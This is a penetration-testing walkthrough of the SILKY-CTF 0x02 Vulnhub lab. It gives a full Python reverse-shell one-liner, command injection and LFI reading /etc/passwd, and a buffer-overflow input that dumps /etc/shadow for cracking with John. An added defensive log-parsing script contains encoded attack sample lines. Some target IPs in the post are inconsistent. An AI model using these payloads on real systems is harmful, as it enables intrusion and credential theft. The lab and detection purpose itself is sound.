Today we will be solving a boot2root lab from Vulnhub called SILKY-CTF: 0x02. This lab is a good way to keep your penetration testing skills on point while getting some variety.
Download it from HERE
Task: Boot to Root (flag.txt)
- Directory Scanning using DIRB
- Giving Credentials For Admin Login
- Exploiting Command Injection Vulnerability
- Fuzzing to exploit LFI Vulnerability
- Reading /etc/passwd file
- Getting a reverse connection using Python Reverse Shell
- Spawning a TTY Shell
- Getting SUID File
- Exploiting Buffer Overflow Vulnerability using Bad Chars and Python Script
- Cracking Hashes using John
- Capturing the flag
Let’s start by scanning the network for targets using Netdiscover.
We found the target IP address 192.168.1.23. Let's begin with basic port scanning with Nmap.
nmap -A -sV 192.168.0.23
The Nmap scan result wasn't much use to us, so we ran a directory brute force with DIRB to enumerate the machine further. This gave us a page, "admin.php", which seemed quite interesting.
After browsing to it, it turned out to be an Admin Login Panel. This might be useful to follow up on.
We clicked on Login and got a login form asking for the admin's username and password. We tried different methods to access the admin panel but were shut down.
We then tried logging in with random credentials.
We noticed the error message was in German. That's different!!
After spending some time looking for a way in, it struck us to check for LFI in the URL, as shown in the image. We successfully executed the ls command there, which means the parameter is vulnerable to command injection.
To confirm the LFI, we did some fuzzing and found the /etc/passwd file.
Moving on, we looked for Flag.txt in the Silky home directory.
It's time to execute a Python reverse shell to get a reverse connection. Before executing the shell, establish a Netcat listener on your machine. Given below is the Python reverse shell we used in the URL to obtain a reverse connection on our Netcat listener.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Oh yeah!! We got the reverse shell on our Netcat listener, but it is not a proper shell. We will spawn a TTY shell using Python.
nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
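From the defender's side, every step above (the injected ls, the /etc/passwd fuzzing and the Python reverse shell) arrives as a query string in the web server's access log. The following script is an added example, not part of the original post or the lab: it parses Apache common-log-format lines, decodes each query parameter on its own (so the `&` separator never trips the metacharacter rule) and tags the indicators a SOC analyst would look for. The log lines, the client IP and the parameter names `username`, `password` and `file` are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache common log format (not from the original post).
# Parameter names and the client IP are assumptions; the payloads mimic the command
# injection, LFI fuzzing and Python reverse shell seen in the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2019:10:01:12 +0000] "GET /admin.php HTTP/1.1" 200 512
10.0.0.5 - - [10/Jul/2019:10:01:40 +0000] "GET /admin.php?username=admin&password=admin HTTP/1.1" 200 488
10.0.0.5 - - [10/Jul/2019:10:02:03 +0000] "GET /admin.php?username=%3Bls&password=x HTTP/1.1" 200 1203
10.0.0.5 - - [10/Jul/2019:10:02:31 +0000] "GET /admin.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2210
10.0.0.5 - - [10/Jul/2019:10:02:55 +0000] "GET /admin.php?username=%3Bcat%20%2Fetc%2Fpasswd&password=x HTTP/1.1" 200 2210
10.0.0.5 - - [10/Jul/2019:10:03:10 +0000] "GET /admin.php?username=%3Bpython%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket()%3Bsubprocess.call(%5B%22%2Fbin%2Fsh%22%5D)%27&password=x HTTP/1.1" 200 12
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns are matched against individual decoded parameter values, never the raw query.
INDICATORS = {
    "shell_metachar": re.compile(r"[;|&`$]"),
    "path_traversal": re.compile(r"\.\./"),
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)\b"),
    "python_reverse_shell": re.compile(r"python\S*\s+-c\b.*\b(socket|subprocess|pty)\b"),
    "shell_binary": re.compile(r"/bin/(ba|da)?sh\b"),
}


def tag_value(value):
    """Indicator names that fire on one parameter value; decoded a second time to catch double encoding."""
    decoded = unquote(value)
    return [name for name, rx in INDICATORS.items() if rx.search(value) or rx.search(decoded)]


def analyze(log_text):
    """Return one finding per log line whose query parameters look like LFI, command injection or reverse-shell delivery."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line
        parts = urlsplit(m.group("url"))
        tags = []
        for _, value in parse_qsl(parts.query, keep_blank_values=True):
            for t in tag_value(value):
                if t not in tags:
                    tags.append(t)
        if tags:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], ",".join(f["tags"]))
```

Only the four malicious lines are reported; the legitimate admin login attempt produces no tags because its values are inspected after the query has been split on `&`.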
While enumerating the directories of the machine, we found a SUID file, cat_shadow. This might come in handy. Let's see.
On executing the file to check what it actually does, we noticed it tries to read the shadow file, but we got permission denied.
We clearly knew we needed to send that hex value, since it seemed the binary is vulnerable to a buffer overflow.
./cat_shadow $(python -c 'print "A"*100')
After some trials, we wrote a simple Python one-liner that prints 64 "A" characters as padding and then appends the value 0x496c5962 in little-endian format. Providing the result as input to the cat_shadow file, we were able to read the /etc/shadow file.
./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')
We then simply copied the hashes into a file on our Kali Linux machine and fired up John to crack them. After some time, we got the password for root. I guess there is only one thing left to do: read our final flag.
We logged in as the root user using the found credentials and easily got our way to the final flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact here.